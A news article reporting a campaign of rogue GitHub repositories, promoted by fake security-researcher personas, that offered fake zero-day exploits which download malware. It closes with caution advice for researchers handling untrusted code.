Attackers set up rogue GitHub repos with malware posing as zero-day exploits
Attackers have been carrying out a unique cyberattack by creating fake GitHub repositories that pretend to offer zero-day exploits for popular applications. However, instead of providing legitimate exploits, these repositories deliver malware. The attackers went to great lengths to create fake personas, including fake GitHub and Twitter accounts posing as security researchers. They even used real photos of researchers from reputable cybersecurity firms, just as they did while distributing fake ChatGPT apps online.
While attacks targeting security researchers are not unheard of, they are relatively rare and often conducted by advanced persistent threat (APT) groups. These groups aim to gain access to sensitive information that researchers possess. In a similar attack reported by Google Threat Analysis Group in 2021, a government-backed North Korean entity created a network of fake accounts on social media platforms, pretending to be security researchers. They used these accounts to promote proof-of-concept exploits and distributed malware to victims.
VulnCheck, a security firm, discovered the first rogue repository in early May and promptly reported it to GitHub, which took it down. The repository claimed to offer a zero-day remote code execution exploit for Signal, a popular secure communications app. Subsequently, the attacker continued creating new accounts and repositories, claiming to have fake exploits for applications like Microsoft Exchange, Google Chrome, Discord, and Chromium. These repositories were promoted through Twitter accounts associated with the fake personas.
While the 2021 attack involved more sophistication than the recent campaign, it's unclear if they are the work of the same attackers. The malicious code, distributed as a file called poc.py from the rogue GitHub repositories, downloads additional files named cveslinux.zip and cveswindows.zip, depending on the operating system. These files contain malware that is flagged by multiple antivirus programs.
Researchers emphasise that security researchers are valuable targets for malicious actors and should exercise caution when downloading code from GitHub. It is crucial to review the code before execution and refrain from using anything that is not understood. Experienced researchers typically take precautions by testing potentially malicious code on isolated systems within a virtual machine, closely monitored, and later deleted. Executing such code on a work machine would likely violate standard security policies, as well as not using a hide VPN, especially within a cybersecurity company.